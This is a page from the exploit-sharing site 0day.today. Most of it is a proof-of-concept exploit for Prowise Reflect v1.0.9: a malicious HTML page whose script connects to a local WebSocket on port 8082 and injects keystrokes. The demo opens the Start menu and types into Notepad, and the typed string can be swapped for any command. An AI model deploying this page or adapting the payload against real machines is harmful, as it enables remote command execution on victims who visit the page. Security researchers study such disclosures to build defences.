0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Prowise Reflect v1.0.9 - Remote Keystroke Injection Exploit
[# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10
# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.
# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
# - Start menu will open, types notepad.exe and types hello world.
<!DOCTYPE HTML>
<html>
<head>
<script type = "text/javascript">
function wait(ms){
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
}
function WebSocketTest() {
var StateConnecting = new Boolean(false);
if ("WebSocket" in window) {
// Let us open a web socket
var ws = new WebSocket("ws://localhost:8082");
ws.onopen = function() {
ws.send('{"event":"keyboard", "key":"super"}');
wait(400);
//character is slower
// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
var exploitcode = "notepad.exe"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(300);
ws.send('{"event":"keyboard", "key":"enter"}');
wait(2000);
exploitcode = "Hello world!"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(200);
};
ws.onmessage = function (evt) {
var received_msg = evt.data;
};
ws.onclose = function() {
// websocket is closed.
alert("Connection is closed...");
};
} else {
// The browser doesn't support WebSocket
alert("WebSocket NOT supported by your Browser!");
}
}
</script>
</head>
<body>
<div id = "sse">
<a href = "javascript:WebSocketTest()">Exploit!</a>
</div>
</body>
</html>
# 0day.today [2024-11-15] #